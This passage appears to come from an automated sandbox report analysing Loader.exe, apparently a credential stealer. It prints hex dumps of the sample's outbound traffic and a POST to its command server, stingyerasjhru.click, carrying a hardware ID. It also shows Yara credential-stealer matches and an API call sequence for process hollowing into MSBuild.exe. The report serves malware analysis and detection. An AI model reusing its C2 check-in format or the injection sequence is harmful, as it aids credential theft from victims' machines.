2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 6e 67 52 1d f0 a2 46 25 34 d0 3c 58 a4 64 f7 75 dd fc 36 46 98 e8 eb 95 43 ae d4 0b 2e b8 a2 52 ba 7e 5d ef 12 fa d0 59 3a f8 ce e3 40 41 96 36 90 51 4f 9b de 95 05 f2 87 0c 8f 06 98 24 f7 b8 bb 34 4d 76 ee 5c 31 0c 9c dd b0 ee d2 a8 b3 46 b6 59 8c 50 c0 1e a6 58 3b ab 73 b0 a4 79 b0 8d 9a 2e 1a c7 b9 d7 87 d1 59 50 25 d6 d7 35 fe cc d9 c7 8a 93 91 84 7a e0 16 ab e4 ba 7e b6 cc 89 89 85 8e f7 5e e7 83 42 a1 a8 e1 32 3a 47 4f 2c 56 e6 04 43 9b 49 b8 66 39 57 b9 61 41 27 1b 2a 6c 38 dd 47 e0 8b 80 94 08 53 6c 9a 87 24 a3 24 b3 3e 74 ef 1e fd f0 d1 62 1c c3 e8 ee b1 37 69 7a 26 4e f9 81 d8 13 07 b6 c5 1f 42 e9 60 56 b3 9c 2f f8 3a 94 2c 76 1d 5a 12 37 34 f8 34 a3 4b 70 db 28 56 0f 8b d8 c8 4c cd f4 15 bb d6 58 e9 f0 9a 75 f8 fe 2a 4d e0 3b 3f 02 58 ed 83 e5 Data Ascii: ngRF%4<Xdu6FC.R~]Y:@A6QO$4Mv\1FYPX;sy.YP%5z~^B2:GO,VCIf9WaA'l8GSl$$>tb7iz&NB`V/:,vZ744Kp(VLXuM;?X
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 10 41 21 7f 01 0c 29 41 04 5d ce f9 b9 5c 6e e1 76 4e a6 3c 4b 49 b2 d8 81 bc 92 82 82 d2 da 7b b4 92 84 3e 1f bf 59 83 27 08 4a 64 81 ae 7c ab 96 87 25 f1 32 27 c0 82 bc f2 0e fe ea a4 f7 02 be 56 2c 2a ac ee c7 d7 05 15 93 a4 79 d1 ce 30 d4 1c 26 2b 7b 81 e5 12 76 4d 12 f5 14 57 c1 0b bb b4 e2 0c d4 0e e7 ce 6d 5a eb b6 1b af 8b cd ae cb fe 42 8f a3 35 4b 1e c2 56 87 64 93 54 04 94 6c 96 c8 8c 27 89 25 87 0c 89 3f 7f fa dc ab 03 13 cc 99 d1 15 16 3e c6 9b b2 14 5e 3d 61 b9 1e c1 4e f8 d6 38 e6 44 68 56 ac c1 df 00 23 8f 65 43 29 d3 7d 17 4d 70 e4 5a 38 cb f9 be 3b ed b4 a5 d1 b1 b7 21 a2 7a a8 df cf f2 bb 6e e2 ba 06 8f 6b c4 eb 5b 38 a6 68 72 6d 53 4a 4a 3f 37 0e 9a ec 3a 72 8a d0 8a a7 e6 47 e3 db 37 fd 55 2a c4 bc b1 a3 9b f3 b4 c5 54 7a b8 b7 4a cb Data Ascii: A!)A]\nvN<KI{>Y'Jd\|%2'V,y0&+{vMWmZB5KVdTl'%?>^=aN8DhV#eC)}MpZ8;!znk[8hrmSJJ?7:rG7UTzJ
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 81 d2 bc 0e 0f 42 6f e6 a3 b4 47 27 c0 c1 17 29 e8 00 f9 aa c2 06 62 dc f4 93 fb fd 76 07 62 8d 81 ff 0c 01 ab 65 78 1d 19 5c e7 17 49 ff 88 ab 7f 4a 08 8d ef dc f8 db 9a e7 f8 f2 6f 97 f2 13 ca a2 85 5c 27 43 1a 98 8d f9 a6 18 7e 8a 19 05 43 66 36 3a e3 f3 92 47 87 e0 59 28 4a bc a1 78 65 63 43 a5 bc 2c 9b 9f 1f 35 a8 65 0f cb 86 be 6b a2 a2 b7 df 2e a8 d5 28 a2 e7 27 ec 48 4e 86 1d 1d 21 cf b9 cc 64 cf 2b ab 63 83 e6 16 e1 a5 e7 07 a4 e1 32 16 da 93 76 ed 79 27 33 25 a4 fc 69 72 29 a0 43 fb e5 de be 14 ff fe 27 65 f6 70 6a 2c 00 cb 24 34 7a 79 34 33 ec 38 64 b7 f6 64 1e 2c 13 da ad 90 26 fd 5b 4e 8e 2b 57 35 8f c4 7d c6 bf bd 4d 3a ea 3f d1 a8 ab a1 ec b8 bf 6d 74 bd cd 32 64 f8 86 5c f4 2f 7b a2 95 b3 25 13 ef 9c f1 4b c5 1d 97 e0 f5 78 ff 62 aa e3 cd Data Ascii: BoG')bvbex\IJo\'C~Cf6:GY(JxecC,5ek.('HN!d+c2vy'3%ir)C'epj,$4zy438dd,&[N+W5}M:?mt2d\/{%Kxb
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: c3 00 02 4f 12 b2 5f eb 17 c4 5f 9b b2 b2 19 98 e0 82 57 91 0d e9 7e 3a c5 b8 3b a5 49 47 97 70 d6 f4 27 0b 9a 37 96 e0 ce b1 d8 79 f0 4d ed 17 ec 83 22 ad 97 d9 17 7c 0f 54 8d fb 22 72 80 66 12 da 0a 08 37 ae f1 bd 76 d3 42 fa 9d c5 24 5b 60 bb b9 7c f2 4f cf 85 6c c9 cc be a1 ca b8 e4 58 59 aa 2f 04 bf 33 6f 33 f4 c7 52 ea bf db 3f 31 a2 ae 5c 70 db 03 9a 30 fb 6c 22 56 78 f0 c9 b0 7a 29 16 b4 b3 4d 42 53 6a b4 fb 0b 43 16 d8 bf cf 34 8f 49 c2 52 8b 39 d2 7f da 6c 7f bb 1e 10 f5 0e 68 64 fd a8 e4 e7 c0 34 8f b9 a3 93 cd 0b af 84 3b 0f 9a 86 be 8f 47 19 c2 f0 0f 2e a7 70 8a 95 39 ad 2b c3 01 95 0f cd 7d a3 52 80 b5 fe 63 75 c7 d0 df 5e 49 f4 eb 09 4d 1e 5b fd 0a 43 c6 0b d1 17 57 78 c6 9b 3e 2b 0c 85 de ad 00 30 7a b9 c6 fd f9 4c 48 f2 9e 98 16 69 39 c7 Data Ascii: O__W~:;IGp'7yM"\|T"rf7vB$[`\|OlXY/3o3R?1\p0l"Vxz)MBSjC4IR9lhd4;G.p9+}Rcu^IM[CWx>+0zLHi9
2024-12-31 16:42:40 UTC	1150	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kri60l2g2m35vhcuip4e834ne8; expires=Sat, 26 Apr 2025 10:29:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fKxf1SD%2Bxf%2FmJSCRNMxijlndPvO4UtZd7dlWFP1j%2FhNLG1UfkPKdLLD%2Ftloo1snVErViy9agCSAiljWYdGQGa1QNxwiQSLNbVbF%2BfuWEVEutrj7JtcoLbxRbf94fvzIC3HdzDwX4Xw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb94978ab6de0-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128891&min_rtt=128743&rtt_var=27399&sent=269&recv=856&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1083785&delivery_rate=29628&cwnd=252&unsent_bytes=0&cid=7239ad9765013f56&ts=4102&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49762	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:40 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: stingyerasjhru.click
2024-12-31 16:42:40 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d 26 68 77 69 64 3d 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 Data Ascii: act=get_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=&hwid=503360CAB129FD4CDB71E32F12885CB3
2024-12-31 16:42:41 UTC	1135	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m0r7a79s7f7gbjusuobsm9v1ul; expires=Sat, 26 Apr 2025 10:29:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42caeh%2BSbeyJbYYvEkWhSA%2Be47vsAE22AKws3Ew2WHy4ldiyemFy5BOnVJJAdnUKSUszaC1tE9PLl1bcTeTPj3VDJ9EdrV1AKyuEiYjfKzSGMxLgvEVQShDmP0bkOVTuRIGHJqVWFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb9660dc58e02-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129433&min_rtt=129405&rtt_var=27349&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=989&delivery_rate=29565&cwnd=250&unsent_bytes=0&cid=50eba1109be9f34c&ts=684&x=0"
2024-12-31 16:42:41 UTC	234	IN	Data Raw: 33 36 61 63 0d 0a 59 68 61 32 4c 74 55 78 65 31 4b 42 53 69 69 59 79 79 2f 55 68 62 4f 71 52 71 6b 4b 52 33 34 37 67 49 34 77 68 74 65 6e 48 42 67 35 62 5a 52 49 6f 52 4e 42 59 36 31 6f 54 62 72 78 48 76 69 6e 31 34 68 38 69 32 6b 4f 4f 32 36 35 30 68 2f 6a 75 35 4a 5a 62 77 56 34 30 6b 47 36 56 30 74 69 39 69 5a 66 37 5a 4a 41 6e 73 50 2b 6b 77 6a 2b 52 53 30 78 51 2b 48 6c 5a 74 79 79 34 33 68 52 57 79 53 45 56 4f 59 49 43 67 72 71 48 6d 76 4c 72 78 32 39 37 65 2b 46 45 76 31 4a 48 7a 30 4f 36 65 6c 62 30 36 32 58 4c 55 46 56 57 34 46 6f 70 47 4d 74 50 72 55 45 47 50 61 49 62 5a 4c 56 31 5a 6b 32 7a 46 67 4b 4e 33 47 7a 37 33 76 4f 37 75 6c 52 55 67 46 61 32 32 57 57 59 79 38 43 31 52 78 43 Data Ascii: 36acYha2LtUxe1KBSiiYyy/UhbOqRqkKR347gI4whtenHBg5bZRIoRNBY61oTbrxHvin14h8i2kOO2650h/ju5JZbwV40kG6V0ti9iZf7ZJAnsP+kwj+RS0xQ+HlZtyy43hRWySEVOYICgrqHmvLrx297e+FEv1JHz0O6elb062XLUFVW4FopGMtPrUEGPaIbZLV1Zk2zFgKN3Gz73vO7ulRUgFa22WWYy8C1RxC
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 39 37 46 63 67 2f 58 32 33 78 37 4f 4f 52 51 59 53 37 62 37 47 2b 43 30 39 53 74 42 4a 31 54 38 53 71 46 61 43 44 2f 35 49 58 53 33 2b 57 4f 6d 34 76 7a 76 62 63 51 39 43 30 59 4d 32 63 67 47 76 72 33 45 61 30 46 56 4a 76 4e 42 6a 56 41 6f 59 37 67 76 65 74 47 73 61 2b 54 78 38 73 31 78 36 47 63 49 54 57 48 32 36 48 57 2f 6b 4f 74 4e 4b 54 73 68 31 56 2b 44 51 43 6b 56 37 58 4a 69 71 4b 42 37 70 4f 50 35 37 6e 58 5a 62 78 55 7a 63 73 71 39 55 63 32 64 6e 6c 4a 56 45 45 2f 33 51 37 51 48 4b 51 62 4f 48 6e 37 79 70 46 57 35 30 73 50 73 45 66 46 74 64 43 31 59 79 73 74 6c 76 34 75 49 65 53 6c 58 55 38 46 4a 75 31 55 55 50 65 64 36 47 4f 2b 6a 57 4b 48 4d 33 4f 41 41 35 44 4d 7a 4b 58 54 70 2b 30 6a 6e 76 50 46 47 66 53 5a 79 2f 42 79 79 59 79 39 68 75 48 78 Data Ascii: 97Fcg/X23x7OORQYS7b7G+C09StBJ1T8SqFaCD/5IXS3+WOm4vzvbcQ9C0YM2cgGvr3Ea0FVJvNBjVAoY7gvetGsa+Tx8s1x6GcITWH26HW/kOtNKTsh1V+DQCkV7XJiqKB7pOP57nXZbxUzcsq9Uc2dnlJVEE/3Q7QHKQbOHn7ypFW50sPsEfFtdC1Yystlv4uIeSlXU8FJu1UUPed6GO+jWKHM3OAA5DMzKXTp+0jnvPFGfSZy/ByyYy9huHx
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 4a 6a 6f 2b 4f 6b 55 2f 56 6f 54 4b 46 48 76 39 45 50 52 70 2b 46 4c 51 41 55 6c 35 55 32 63 64 43 35 72 33 57 56 4e 39 50 35 71 6f 2b 4c 64 7a 69 6e 47 62 48 64 4f 54 4f 7a 35 52 64 2b 34 37 56 70 56 57 31 6a 68 59 62 39 2b 41 7a 50 71 48 48 4c 39 6a 30 75 65 38 74 54 34 45 70 6f 7a 63 53 5a 51 31 4d 31 7a 34 75 58 4f 64 45 52 4e 51 75 4a 74 6a 58 4a 4f 4f 2b 59 68 66 65 4c 37 48 6f 32 7a 2f 70 30 41 32 46 67 52 45 67 2f 4f 76 6c 37 46 6c 65 46 4d 66 6c 46 6d 30 33 79 59 65 44 46 68 34 41 46 67 6f 59 56 69 6e 75 62 2f 78 77 33 71 57 42 4d 75 62 39 62 6b 58 2f 79 6b 38 47 78 65 4e 55 37 52 48 59 5a 53 4d 68 66 55 63 33 53 33 72 6b 50 68 77 4d 54 4e 4b 4d 31 6c 4b 42 67 4c 73 50 6c 63 38 61 4c 2b 63 31 49 6b 57 34 39 67 67 6e 34 52 48 66 6b 72 51 38 36 52 Data Ascii: Jjo+OkU/VoTKFHv9EPRp+FLQAUl5U2cdC5r3WVN9P5qo+LdzinGbHdOTOz5Rd+47VpVW1jhYb9+AzPqHHL9j0ue8tT4EpozcSZQ1M1z4uXOdERNQuJtjXJOO+YhfeL7Ho2z/p0A2FgREg/Ovl7FleFMflFm03yYeDFh4AFgoYVinub/xw3qWBMub9bkX/yk8GxeNU7RHYZSMhfUc3S3rkPhwMTNKM1lKBgLsPlc8aL+c1IkW49ggn4RHfkrQ86R
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 37 6c 4c 4f 42 41 64 42 39 78 75 4f 64 64 30 4c 2f 7a 61 79 67 44 4c 75 42 65 73 32 55 74 4f 4f 5a 79 65 74 36 75 66 49 4b 30 69 2f 4e 78 34 44 6c 77 44 48 6a 4e 39 47 4c 78 6b 73 35 75 59 51 51 69 30 57 32 43 66 43 64 39 79 41 39 2b 39 59 64 4c 6c 2b 62 56 2b 78 2f 6e 62 67 67 6b 62 63 57 38 64 2b 37 76 7a 69 38 68 46 56 33 43 42 5a 39 79 49 6a 48 58 49 78 44 2b 38 78 61 78 78 4d 44 59 43 50 35 6d 42 54 68 42 78 66 78 6f 38 2b 58 41 5a 55 41 6e 49 4f 42 62 67 6c 51 51 47 74 6b 77 62 73 71 6c 66 49 61 31 36 38 39 7a 37 57 55 33 48 56 65 78 75 6e 54 48 74 50 52 31 57 7a 46 76 2b 46 36 44 52 77 38 4b 34 69 52 68 7a 4c 74 39 6e 39 33 45 38 78 66 72 4d 6e 51 5a 64 4b 76 47 5a 73 71 51 31 55 78 2b 4b 48 2f 69 64 72 4a 39 4d 47 58 30 4c 56 33 33 70 47 61 52 39 Data Ascii: 7lLOBAdB9xuOdd0L/zaygDLuBes2UtOOZyet6ufIK0i/Nx4DlwDHjN9GLxks5uYQQi0W2CfCd9yA9+9YdLl+bV+x/nbggkbcW8d+7vzi8hFV3CBZ9yIjHXIxD+8xaxxMDYCP5mBThBxfxo8+XAZUAnIOBbglQQGtkwbsqlfIa1689z7WU3HVexunTHtPR1WzFv+F6DRw8K4iRhzLt9n93E8xfrMnQZdKvGZsqQ1Ux+KH/idrJ9MGX0LV33pGaR9
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 76 51 77 41 51 41 37 4c 45 61 73 43 75 38 69 6c 51 55 6d 62 6a 54 36 4e 67 4e 67 6a 4e 44 32 4c 37 71 58 50 37 37 59 54 51 45 75 45 68 44 51 39 55 36 4f 4a 58 7a 4f 4c 74 57 33 39 52 52 64 42 55 6a 47 59 51 43 73 73 6d 48 71 43 68 51 37 72 4c 33 4d 55 61 68 6b 4e 2f 42 33 7a 74 77 31 37 4e 67 63 56 4d 56 7a 34 35 37 6b 47 52 53 54 30 54 37 79 4a 2f 39 61 46 48 6d 76 7a 33 37 41 7a 67 62 43 73 38 56 65 66 66 64 4c 47 41 77 31 35 30 4d 33 6a 34 47 37 64 51 50 51 4c 4a 43 33 53 33 2b 52 32 6e 38 65 61 65 50 70 42 49 63 42 4a 63 39 4c 35 64 78 5a 6a 79 53 45 52 4e 49 76 4e 61 67 45 41 4c 42 66 51 38 52 73 69 36 65 49 54 39 2f 63 77 74 34 6b 6b 56 43 56 6e 6c 2f 6e 4b 2b 76 65 35 4a 63 52 64 48 32 55 69 63 52 51 49 77 35 68 38 52 78 4f 52 4d 74 63 33 2f 2b 69 Data Ascii: vQwAQA7LEasCu8ilQUmbjT6NgNgjND2L7qXP77YTQEuEhDQ9U6OJXzOLtW39RRdBUjGYQCssmHqChQ7rL3MUahkN/B3ztw17NgcVMVz457kGRST0T7yJ/9aFHmvz37AzgbCs8VeffdLGAw150M3j4G7dQPQLJC3S3+R2n8eaePpBIcBJc9L5dxZjySERNIvNagEALBfQ8Rsi6eIT9/cwt4kkVCVnl/nK+ve5JcRdH2UicRQIw5h8RxORMtc3/+i
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 4e 6e 6d 78 77 6d 6a 4f 6a 76 64 61 63 79 46 7a 68 32 57 6e 53 7a 63 4c 75 51 6b 5a 7a 36 4d 45 6a 4e 4c 57 6d 77 6e 5a 51 42 34 45 56 4d 66 33 53 76 2b 6c 6c 6b 59 70 57 32 50 4f 42 62 74 56 44 54 33 37 63 6e 6a 53 2f 6d 57 54 34 6f 44 35 41 4d 35 41 4b 45 31 72 31 2b 4a 52 31 5a 4c 4f 4b 6c 74 4a 5a 4e 46 47 75 58 51 4e 4f 50 45 54 55 4f 36 6f 58 72 2f 33 2f 4d 30 68 39 53 55 58 47 31 44 57 31 46 58 43 73 2b 35 4c 57 51 39 38 7a 6b 48 6a 5a 77 73 57 77 67 5a 48 31 50 31 35 72 74 79 42 37 67 66 2b 5a 41 59 50 56 38 58 30 41 4e 43 38 31 6c 31 74 4d 33 6a 2b 57 4b 5a 35 53 68 37 59 63 6d 75 6f 6d 31 75 74 33 39 62 63 63 4f 56 47 4b 78 6c 77 32 4c 64 2b 79 35 33 50 54 45 73 78 65 2f 42 50 68 55 51 71 4e 75 59 66 66 65 76 67 53 72 76 71 31 65 41 55 32 6c 4a Data Ascii: NnmxwmjOjvdacyFzh2WnSzcLuQkZz6MEjNLWmwnZQB4EVMf3Sv+llkYpW2POBbtVDT37cnjS/mWT4oD5AM5AKE1r1+JR1ZLOKltJZNFGuXQNOPETUO6oXr/3/M0h9SUXG1DW1FXCs+5LWQ98zkHjZwsWwgZH1P15rtyB7gf+ZAYPV8X0ANC81l1tM3j+WKZ5Sh7Ycmuom1ut39bccOVGKxlw2Ld+y53PTEsxe/BPhUQqNuYffevgSrvq1eAU2lJ
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 39 5a 5a 37 6f 75 49 53 45 77 68 54 74 52 38 6f 56 42 49 46 75 73 46 47 76 4b 6c 54 75 50 78 33 2f 49 51 37 57 4d 4f 50 33 72 57 2b 46 37 53 6b 50 56 72 4c 43 68 2f 2b 68 71 66 56 44 41 61 75 41 52 6c 30 71 39 62 6b 37 54 65 77 77 6e 6d 50 53 59 78 57 4d 7a 37 41 74 43 7a 38 6c 4e 52 42 58 54 30 65 59 6b 65 51 67 36 75 46 67 66 35 70 78 71 58 36 73 58 4e 4b 70 31 6c 49 55 34 4c 39 2b 49 45 35 49 43 53 58 6d 38 78 4c 39 73 46 6f 31 73 30 4b 75 41 76 52 4b 47 5a 61 71 44 4a 79 66 73 75 79 44 4d 67 56 57 65 76 2f 42 76 2b 70 50 5a 6f 66 51 46 4d 7a 46 33 6e 56 42 34 4b 32 44 35 30 74 37 31 67 68 39 50 64 35 52 48 48 4f 6e 38 74 53 74 4c 71 42 62 36 68 36 54 64 50 56 6c 2f 46 65 71 4d 42 43 68 36 31 41 45 33 54 67 78 61 61 79 50 6e 50 44 2f 4d 79 50 52 4a 70 Data Ascii: 9ZZ7ouISEwhTtR8oVBIFusFGvKlTuPx3/IQ7WMOP3rW+F7SkPVrLCh/+hqfVDAauARl0q9bk7TewwnmPSYxWMz7AtCz8lNRBXT0eYkeQg6uFgf5pxqX6sXNKp1lIU4L9+IE5ICSXm8xL9sFo1s0KuAvRKGZaqDJyfsuyDMgVWev/Bv+pPZofQFMzF3nVB4K2D50t71gh9Pd5RHHOn8tStLqBb6h6TdPVl/FeqMBCh61AE3TgxaayPnPD/MyPRJp
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 65 45 30 45 34 73 44 69 62 64 59 62 31 56 50 6a 7a 79 4d 68 72 68 2f 6e 50 37 39 50 37 6d 4a 2f 74 4c 4a 43 59 4d 2b 62 5a 42 79 75 43 51 53 53 67 4c 57 34 46 6f 75 6c 49 75 50 73 42 36 61 66 62 7a 5a 36 62 5a 6e 4d 78 31 32 56 30 41 4f 48 66 34 34 6d 62 4e 6a 35 35 53 62 67 42 6c 38 42 2b 47 52 79 30 7a 7a 69 4a 78 36 36 52 38 76 72 66 6b 77 68 58 38 55 33 39 48 57 4d 6e 4c 5a 62 57 39 34 6e 46 66 44 6d 48 41 5a 71 38 46 46 44 53 78 65 6d 72 4d 67 6b 65 38 39 76 7a 6b 50 4d 39 59 66 7a 5a 70 73 71 55 46 33 37 4f 4d 57 7a 4d 46 5a 76 52 39 6e 58 6f 70 4f 65 49 46 61 38 47 69 42 4a 66 64 32 73 49 61 68 6c 34 54 50 57 50 43 78 31 72 74 75 65 73 76 4c 78 70 62 78 32 71 64 56 52 63 44 38 53 64 4f 33 72 73 61 2f 37 48 4c 39 6d 6e 42 63 43 77 62 62 63 33 48 63 Data Ascii: eE0E4sDibdYb1VPjzyMhrh/nP79P7mJ/tLJCYM+bZByuCQSSgLW4FoulIuPsB6afbzZ6bZnMx12V0AOHf44mbNj55SbgBl8B+GRy0zziJx66R8vrfkwhX8U39HWMnLZbW94nFfDmHAZq8FFDSxemrMgke89vzkPM9YfzZpsqUF37OMWzMFZvR9nXopOeIFa8GiBJfd2sIahl4TPWPCx1rtuesvLxpbx2qdVRcD8SdO3rsa/7HL9mnBcCwbbc3Hc
2024-12-31 16:42:41 UTC	1369	IN	Data Raw: 6c 56 31 42 5a 6a 32 47 69 56 68 41 46 77 79 39 4f 2f 49 4a 35 73 39 4c 56 6d 53 72 59 58 58 63 71 66 65 48 71 42 4f 2b 2f 37 55 68 4d 49 55 37 73 47 37 39 6b 45 41 48 64 5a 52 69 74 67 68 6a 74 73 76 53 42 46 4f 59 37 63 67 73 4c 36 38 46 79 35 59 66 42 57 47 67 37 4c 2f 74 34 70 51 4e 49 47 63 42 7a 5a 74 6d 42 53 2f 2f 6f 2f 65 45 55 34 6e 77 55 45 6c 48 31 30 68 2f 31 6e 74 64 5a 4c 6a 70 34 33 48 32 54 61 44 30 35 75 48 35 2f 39 4b 4a 36 72 4f 54 64 79 33 4c 47 53 58 64 50 66 75 79 39 52 64 2b 67 2f 56 6c 6f 57 31 6e 54 59 65 4d 61 41 79 54 71 48 57 62 39 68 42 61 64 7a 74 54 79 4b 4a 70 77 4e 69 5a 51 31 4f 6b 4a 36 4c 62 55 55 31 6c 61 51 65 5a 74 6e 58 77 31 59 2b 4a 68 61 74 53 38 66 72 72 73 39 2f 38 67 6e 6b 35 79 45 6e 4c 30 2f 58 79 74 73 74 Data Ascii: lV1BZj2GiVhAFwy9O/IJ5s9LVmSrYXXcqfeHqBO+/7UhMIU7sG79kEAHdZRitghjtsvSBFOY7cgsL68Fy5YfBWGg7L/t4pQNIGcBzZtmBS//o/eEU4nwUElH10h/1ntdZLjp43H2TaD05uH5/9KJ6rOTdy3LGSXdPfuy9Rd+g/VloW1nTYeMaAyTqHWb9hBadztTyKJpwNiZQ1OkJ6LbUU1laQeZtnXw1Y+JhatS8frrs9/8gnk5yEnL0/Xytst

Target ID:	0
Start time:	11:42:25
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xcc0000
File size:	816'640 bytes
MD5 hash:	287009EDB0CE8E161D3A6328864FCF30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:42:26
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eb660000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:42:26
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xcc0000
File size:	816'640 bytes
MD5 hash:	287009EDB0CE8E161D3A6328864FCF30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105992992.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00CF019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CF0110,00CF0100), ref: 00CF0334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CF0347
Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 00CF0365
ReadProcessMemory.KERNELBASE(0000009C,?,00CF0154,00000004,00000000), ref: 00CF0389
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00CF03B4
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00CF040C
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00CF0457
WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00CF0495
Wow64SetThreadContext.KERNEL32(000000A0,008D0000), ref: 00CF04D1
ResumeThread.KERNELBASE(000000A0), ref: 00CF04E0

Strings

SetThreadContext, xrefs: 00CF02C2
VirtualAlloc, xrefs: 00CF0263
ress, xrefs: 00CF0226
CreateProcessW, xrefs: 00CF0250
ReadProcessMemory, xrefs: 00CF0289
aryA, xrefs: 00CF01E2
VirtualAllocEx, xrefs: 00CF029C
Load, xrefs: 00CF01DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00CF0333
WriteProcessMemory, xrefs: 00CF02AF
GetThreadContext, xrefs: 00CF0276
TerminateProcess, xrefs: 00CF03C3
